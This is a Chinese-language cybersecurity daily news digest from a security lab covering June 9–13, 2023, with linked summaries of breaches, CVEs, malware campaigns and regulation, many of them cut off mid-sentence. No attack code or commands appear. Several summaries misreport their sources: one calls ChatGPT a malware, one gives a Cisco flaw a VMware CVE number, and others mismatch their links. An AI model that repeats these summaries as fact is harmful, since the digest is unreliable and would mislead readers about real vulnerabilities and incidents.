Forta是一家提供安全文件传输解决方案的软件公司,其GoAnywhere产品可以帮助组织自动化与合作伙伴的数据交换。然而,该产品存在一个漏洞,已经被多个黑客利用来入侵Forta的客户,包括许多医疗行业的实体,导致数百万人的个人信息泄露。最近,一家提供患者债务收集软件的公司Intellihartx(也称为ITx)成为了Forta相关数据泄露事件的最新受害者。该公司在6月8日向缅因州的司法部门提交了一份数据泄露报 5、Visual Studio存在UI漏洞,攻击者可伪造扩展签名 https://www.varonis.com/blog/visual-studio-bug Visual Studio是一款流行的集成开发环境(IDE),提供了数百种扩展,可以增强其功能和效率。然而,研究人员发现了一个UI漏洞(CVE-2023-28299),可以让攻击者在安装扩展时伪造扩展签名,从而冒充任何发布者。微软已经在2023年4月11日的补丁周二更新中修复了这个漏洞。这个漏洞的利用方法很简单,只需在扩展的名称中添加足够多的换行符,就可以将安装提示中的其他文本推到下方,使其不可见。攻击者还可以在扩展名称下方添加假的“数字签名”文本,让用户误以为扩展是经过签名的。攻击者可以利用这个漏 6、英国出台新政策,打击授权支付诈骗 https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/1154660/Fraud_Strategy_2023.pdf 授权支付诈骗(APP)是一种常见的网络诈骗形式,指的是诈骗者通过欺骗或威胁的方式,让受害者自己授权向诈骗者的账户转账。这种诈骗往往利用了快速支付服务(Faster Payments Service)的速度和便利性,使受害者难以取消或追回转账。根据英国支付系统监管机构(Payment Systems Regulator)的数据,2021年英国 7、微软 2023 年 6 月周二补丁日修复了 6 个严重漏洞 https://securityaffairs.com/147452/security/microsoft-patch-tuesday-june-2023.html 2023 年 6 月的 Microsoft Patch Tuesday 安全更新修复了多个产品中的 69 个漏洞,包括 Microsoft Windows 和 Windows 组件;办公室和办公室组件;交换服务器;Microsoft Edge(基于 Chromium);共享服务器;.NET 和 Visual Studio;微软团队;Azure 开发运营;微软动态;和远程桌面客户端。Microsoft 解决的 69 个漏洞中有 6 8、英国通信监管机构 Ofcom 遭 MOVEit 文件传输零日漏洞攻击 https://securityaffairs.com/147396/data-breach/ofcom-hacked-moveit-zero-day.html 在Clop 勒索软件利用 MOVEit 文件传输零日漏洞进行攻击后,英国通信监管机构 Ofcom 遭遇数据泄露。 9、黑客通过冒充新闻记者窃取 300 万美元加密货币 https://www.bleepingcomputer.com/news/cryptocurrency/hackers-steal-3-million-by-impersonating-crypto-news-journalists/ 一个被追踪为“Pink Drainer”的黑客组织正在冒充记者进行网络钓鱼攻击,以破坏 Discord 和 Twitter 帐户以进行加密货币窃取攻击。 10、OpenAI CEO呼吁与中国合作应对AI风险 https://cn.wsj.com/articles/openai-ceo%E5%91%BC%E5%90%81%E4%B8%8E%E4%B8%AD%E5%9B%BD%E5%90%88%E4%BD%9C%E5%BA%94%E5%AF%B9ai%E9%A3%8E%E9%99%A9-41ab03da OpenAI CE0 Sam Altman 通过远程连线的方式参与了一场中国的 AI 会议。他强调了美国和中国研究人员通过合作降低AI系统风险的重要性。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年06月13日
1、研究人员发现新型恶意软件LOBSHOT https://www.elastic.co/cn/security-labs/elastic-charms-spectralviper 研究人员发现了一种新型恶意软件,命名为LOBSHOT。LOBSHOT是一种利用Windows系统的BITS服务(Background Intelligent Transfer Service)来下载和执行恶意代码的后门程序。BITS服务是一种用于在网络带宽不足时传输文件的技术,通常用于Windows更新或其他应用程序更新。LOBSHOT利用BITS服务的特性,可以绕过防火墙和杀毒软件的检测,实现隐蔽和持久的攻击。研究人员对 LOBSHOT的运行机制和通信协 2、研究人员发现大规模加密货币诈骗活动 https://www.trendmicro.com/en_us/research/23/f/impulse-team-massive-cryptocurrency-scam.html Impulse Team是一个俄语的威胁行为者,他们通过一个名为Impulse Project的联盟计划,运营着一个涉及超过一千个网站的大规模加密货币诈骗活动。这个活动至少从2021年开始,一直持续到现在,虽然有一些个别的报告揭露了其中的部分网站,但没有一个完整的总结。诈骗者的手法是利用高级费用欺诈,让受害者相信他们赢得了一定数量的加密货币。但是,要获得奖励,受害者需要支付一小笔钱,在他们的网站上开设一个账户 3、研究人员揭露图片插入窃取信息攻击技术 https://www.avanan.com/blog/surging-to-inboxes 研究人员发现了一种利用图片插入技术来窃取信息的攻击。图片插入技术是一种在HTML邮件中嵌入图片的方法,可以让收件人在不点击任何链接的情况下就能看到图片。这种技术通常用于跟踪邮件的打开率和用户行为,但也可以被恶意利用。在这种攻击中,黑客发送了一封伪装成来自Microsoft的邮件,声称收件人的Office 365订阅即将到期,并要求他们更新付款信息。邮件中包含了一个图片插入代码,指向了一个恶意网站,该网站会记录收件人的IP地址、地理位置、浏览器类型等信息。这些信息可以帮助黑客定位目标,并为后续的攻击做 4、Strava热力图功能暴露用户家庭地址 https://anupamdas.org/paper/CONPRO2023.pdf Strava是一款流行的跑步伴侣和健身追踪应用,拥有超过1亿用户,可以帮助用户记录他们的心率、活动细节、GPS位置等信息。研究人员发现,热力图这项功能存在一个隐私风险,可能被滥用来识别用户的家庭地址。在这种攻击中,黑客利用公开可用的热力图数据和特定用户的元数据,来跟踪和去匿名化用户。 5、Fortinet修复Fortigate防火墙远程代码执行漏洞 https://olympecyberdefense.fr/1193-2/ 最近,该公司发布了多个版本的FortiOS,即Fortigate防火墙的操作系统/固件,但没有提及它们包含了对CVE-2023-27997的修复,这是一个不需要攻击者登录就可以利用的远程代码执行(RCE)漏洞。该漏洞已经在FortiOS版本7.2.5、7.0.12、6.4.13、6.2.15中得到修复,而且似乎也在v6.0.17中得到修复。企业管理员建议尽快升级Fortigate设备,因为如果这个漏洞还没有被攻击者利用,很可能很快就会被利用。关于CVE-2023-27997的具体细节目前还不清楚。据Olympe Cy 6、本田电商平台被黑客攻破,泄露客户和经销商信息 https://eaton-works.com/2023/06/06/honda-ecommerce-hack 本田汽车公司提供了一个名为本田经销商网站的电商平台,让经销商可以轻松创建网站和销售本田的发电机、割草机、船用发动机等产品。然而,这个平台存在一个严重的安全漏洞,让黑客可以通过一个脆弱的密码重置API,轻松地重置任何账户的密码,并获取该账户的所有数据。黑客Eaton在6月6日公开了这个漏洞的细节,他称他利用这个漏洞成功入侵了本田的电商平台,并获得了完全的管理员权限。Eaton表示,这次攻击并没有影响本田的汽车业务,只影响了发电设备/船用/草坪园艺业务。本田汽车的车主不需要担心,只有那 7、微软警告多阶段 AiTM 网络钓鱼和 BEC 攻击 https://securityaffairs.com/147327/hacking/aitm-bec-attacks.html Microsoft 发现了针对银行和金融服务组织的多阶段中间对手(AiTM) 网络钓鱼和商业电子邮件泄露 (BEC) 攻击。在 AiTM 网络钓鱼中,威胁行为者在目标用户和用户希望访问的网站之间设置代理服务器,该网站是攻击者控制下的网络钓鱼站点。代理服务器允许攻击者访问流量并捕获目标的密码和会话 cookie。微软发现,攻击者最初危害了一个受信任的供应商,然后以 AiTM 攻击和后续 BEC 活动为目标的多个组织。 8、专家发现了新的 MOVEit Transfer SQL 注入漏洞 https://securityaffairs.com/147299/security/new-moveit-transfer-sql-inj.html Progress Software 已发布安全更新,以解决 MOVEit Transfer 应用程序中新的 SQL 注入漏洞。攻击者可以利用MOVEit Transfer解决方案中的SQL注入漏洞窃取敏感信息。 9、三部门发布《关于依法惩治网络暴力违法犯罪的指导意见(征求意见稿)》 https://www.freebuf.com/news/369218.html 为依法惩治网络暴力违法犯罪活动,有效维护公民人格权益和正常网络秩序,根据刑法、刑事诉讼法、民法典、民事诉讼法及治安管理处罚法等有关规定,最高人民法院、最高人民检察院、公安部联合发布了《关于依法惩治网络暴力违法犯罪的指导意见(征求意见稿)》(以下简称《指导意见》)。 10、《我的世界》模组被发现感染恶意程序 Fracturiser https://www.solidot.org/story?sid=75190 为《我的世界(Minecraft)》提供模组的平台 CurseForge 建议用户立即停止下载或更新模组,它托管的模组开发者账号遭到入侵,数十个流行的插件和模组被植入了恶意程序 Fracturise。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年06月12日
1、研究人员揭露DarkRace勒索软件团伙的真面目 https://blog.cyble.com/2023/06/08/unmasking-the-darkrace-ransomware-gang/ 最近,研究人员发现了一个名为DarkRace的勒索软件团伙,该团伙通过钓鱼邮件和恶意附件来感染目标系统,然后加密文件并要求赎金。研究人员对DarkRace的攻击方法、赎金要求、支付方式、联系方式等进行了详细的分析,并发现了一些有趣的细节,例如:DarkRace使用了一个自定义的加密算法,称为“DarkRace加密器”,该算法使用了AES-256和RSA-2048来加密文件。 2、黑客利用ChatGPT的自然语言生成技术传播恶意代码 https://vulcan.io/blog/ai-hallucinations-package-risk 近日,安全研究人员发现了一种名为ChatGPT的恶意软件,它可以利用自然语言生成(NLG)技术来制造虚假的信息,从而误导用户或者影响舆论。这种恶意软件可以通过社交媒体、电子邮件或者聊天软件等渠道传播,它可以根据用户的输入或者上下文来生成符合语法和逻辑的假消息,例如谣言、诈骗、政治宣传等。 3、物联网僵尸网络对电信网络发动大规模DDoS攻击 https://pf.content.nokia.com/t00902-trust-threat-intelligence-report/report-nokia-threat-intelligence-report-2023 根据诺基亚的最新报告,物联网(IoT)僵尸网络在2022年对电信网络发动了大规模的分布式拒绝服务(DDoS)攻击,导致网络中断、延迟和质量下降。物联网僵尸网络是指由被黑客控制的大量物联网设备组成的网络,它们可以被用来向目标服务器发送大量的请求,从而使其无法正常提供服务。报告显示,物联网僵尸网络的规模和复杂度都在不断增长,它们可以利用多种技术来隐藏自己的身份和活动,例如 4、Vivaldi浏览器伪装成Edge浏览器来绕过Bing聊天限制 https://vivaldi.com/blog/vivaldi-on-android-6-1/ Vivaldi浏览器是一款基于Chromium的自定义浏览器,它提供了许多独特的功能和选项。最近,Vivaldi浏览器的开发者发现,Bing搜索引擎只允许使用Edge浏览器的用户访问其聊天功能,而其他浏览器的用户则被拒绝。为了解决这个问题,Vivaldi浏览器决定伪装成Edge浏览器来绕过Bing聊天的限制。Vivaldi浏览器的开发者认为,Bing聊天的限制是一种不公平的做法,它违反了网络中立性的原则,也损害了用户的选择权和体验。他们希望Bing能够改变这种做法,对所有浏览器的用户提供同样的服 5、研究人员公开了Win32k提权漏洞CVE-2023-29336的POC https://www.numencyber.com/cve-2023-29336-win32k-analysis/ 研究人员发布了针对Windows操作系统的CVE-2023-29336漏洞的POC(概念验证)。CVE-2023-29336是一种影响Windows操作系统的内核缓冲区溢出漏洞,它存在于Win32k组件中,该组件负责处理用户界面和图形相关的功能。该漏洞可以被本地攻击者利用,通过向Win32k发送特制的消息,触发内核缓冲区溢出,从而执行任意代码,提升权限,绕过安全机制,甚至导致系统崩溃。该漏洞的原因是Win32k在处理某些消息时,没有正确地检查输入参数的长度和类型,导致在分配和 6、北非遭受"隐形士兵"后门间谍攻击 https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/ 北非地区近期发生了一系列高度定向的间谍攻击,攻击者利用了一个名为“隐形士兵”的新型自定义模块化后门。隐形士兵后门是一个未公开的恶意程序,主要用于执行监视功能,如文件窃取、屏幕和麦克风录制、键盘记录和浏览器信息窃取。该后门的命令和控制(C&C)网络是一个更大的基础设施的一部分,至少部分用于对政府实体进行钓鱼攻击。根据钓鱼网站的主题和VirusTotal的提交情况,该活动 7、日本制药巨头受勒索软件攻击,系统下线 https://www.eisai.com/news/2023/news202341.html 日本制药公司Eisai在6月3日发现了一起勒索软件攻击,导致多台服务器被加密。Eisai立即执行了事故应对计划,将系统下线以控制攻击,并启动了调查。Eisai表示,已经成立了一个跨部门的专案组,并在外部专家和执法机构的建议下进行恢复工作和影响范围的评估。此次攻击影响了日本和海外的服务器,包括物流系统,目前尚未恢复。Eisai的企业网站和电子邮件系统仍然正常运行。Eisai表示,目前尚未确定在攻击过程中是否有数据被泄露或窃取。“此次事件对本财年合并业绩预测的潜在影响目前正在仔细审查中,”该公司还说。 8、美国司法部指控两名俄罗斯公民参与Mt. Gox黑客攻击 https://dd80b675424c132b90b3-e48385e382d2e5d17821a5e1d8e4c86b.ssl.cf1.rackcdn.com/external/usvbilyuchenkoandvernerindictment.pdf 美国联邦检察官指控两名俄罗斯公民参与了2014年导致加密货币交易平台Mt. Gox破产的盗窃行为,当时Mt. Gox是全球最大的加密货币平台。检察官指控Aleksandr Verner(29岁)和Alexey Bilyuchenko(43岁)从Mt. Gox的热钱包存储中窃取了至少647,000个比特币,并对所得款项进行了洗钱。 9、紧急安全更新: 思科和 VMware 修复关键漏洞 https://www.freebuf.com/news/368976.html VMware已经发布了安全更新,以修复Aria Operations for Networks中可能导致信息泄露和远程代码执行的三个漏洞。在发出警报的同时,思科还对其Expressway系列和网真视频通信服务器(VCS)中的一个关键漏洞进行了修复,该漏洞可以允许具有管理员级别只读凭证的认证攻击者在受影响的系统上将其权限提升到具有读写凭证的管理员。 10、2023 年 OWASP 十大 API 安全风险清单 https://www.freebuf.com/news/368984.html OWASP API 安全项目旨在解决越来越多的组织将潜在敏感 API 作为其软件产品的一部分进行部署的问题,这些 API 通常用于内部任务和与第三方的接口。不幸的是,许多 API 没有经过严格的安全测试。OWASP API 安全项目通过强调不安全 API 中的潜在风险,并说明如何减轻这些风险,为软件开发人员和安全评估人员提供价值。为了实现这一目标,OWASP AP I安全项目创建了一份 10 大 API 安全风险文名单。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年06月09日
1、朝鲜黑客组织Kimsuky发起新的社交工程攻击 https://www.sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/ 一个名为Kimsuky的朝鲜黑客组织近期发起了一系列针对政府、军事、外交和研究机构的社交工程攻击,旨在窃取敏感信息和收集战略情报。Kimsuky是一个自2012年以来就活跃的网络间谍组织,曾经针对韩国、美国、俄罗斯、欧洲和联合国等多个国家和组织的目标进行过攻击。 2、Prism Launcher官网被黑客入侵,用户需注意 https://prismlauncher.org/news/cf-compromised-alert/ 根据Prism Launcher官网的公告,该网站在2023年6月7日被一名黑客入侵,导致部分用户的电子邮件地址和密码被泄露。Prism Launcher是一个开源的Minecraft启动器,可以管理多个实例、账户和模组。该网站表示,黑客利用了Cloudflare的一个漏洞,绕过了防火墙,然后利用了一个未知的PHP漏洞,执行了任意代码,从而获取了数据库的访问权限。 3、美国多家机构遭遇匿名苏丹匿名者组织发动的DDoS攻击 https://blog.cyble.com/2023/06/07/anonymous-sudan-launches-fresh-wave-of-ddos-attacks-on-american-organizations-including-microsoft/ 一个名为匿名苏丹(Anonymous Sudan)的黑客组织近期发动了一波针对美国多家机构的分布式拒绝服务(DDoS)攻击,其中包括微软、Lyft和一些医院。匿名苏丹是一个声称从事网络行动主义和黑客活动的组织,他们是更大的匿名(Anonymous)网络的一部分,后者是一个由不同国家和地区的黑客和活动家组成的松散联盟。 4、VMware产品存在严重漏洞,可被远程执行代码 https://www.vmware.com/security/advisories/VMSA-2023-0012.html VMware Aria Operations for Networks(原名vRealize Network Insight)存在一个严重的漏洞(CVE-2023-20887),可被未经身份验证的攻击者利用,远程执行任意代码。VMware Aria Operations for Networks是一个网络和应用监控工具,可以监控、发现和分析多云环境中的网络和应用,构建一个优化、高可用和安全的网络基础设施。 5、Barracuda建议用户尽快更换Web应用防火墙设备 https://www.barracuda.com/company/legal/esg-vulnerability Barracuda Networks公司近日发布了一份紧急通知,建议用户尽快更换其Web应用防火墙(WAF)设备,因为这些设备已经过时,无法支持最新的安全功能和更新。Barracuda Web应用防火墙是一种保护网站和应用免受各种网络攻击的解决方案,包括OWASP Top 10、零日威胁、数据泄露和应用层拒绝服务(DoS)攻击。 6、Cisco Expressway存在权限提升漏洞,可被本地用户利用 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-priv-esc-Ls2B9t7b 根据Cisco的安全公告,Cisco Expressway存在一个权限提升漏洞(CVE-2023-20887),可被本地用户利用,获取root用户的权限。Cisco Expressway是一种通信网关,可以提供防火墙外部的用户简单、高度安全的访问所有协作工作负载,包括视频、语音、内容、即时消息和在线状态。 7、美国航空航天国防工业遭严重恶意软件攻击 https://www.freebuf.com/news/368892.html 来自Adlumin威胁研究的研究人员发现了一个新的恶意PowerShell脚本,被称为PowerDrop,被用于针对美国航空航天领域的组织的攻击。这种基于PowerShell的恶意软件使用先进的技术来躲避检测,包括欺骗、编码和加密。 8、美国发射首颗靶场卫星,将举办首场真实环境太空黑客大赛 https://www.secrss.com/articles/55422 已举办三届的Hack-A-Sat黑掉卫星大赛,首次从模拟形式走向实网对抗。今年的DEF CON上将出现大模型黑客赛、卫星黑客赛等热门活动。 9、日本政府针对OpenAI发布个人信息处理和使用指南 https://www.secrss.com/articles/55378 6月2日,日本个人信息保护委员会(PPC)宣布根据《个人信息保护法》(APPI)向ChatGPT开发商OpenAI发布行政指南。 10、FBI警告:有人正利用AI合成的虚假裸照实施敲诈勒索 https://www.bleepingcomputer.com/news/security/sextortionists-are-making-ai-nudes-from-your-social-media-images/ FBI近日警告称,恶意行为者制作深度虚假内容来实施性勒索攻击的趋势正在上升。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页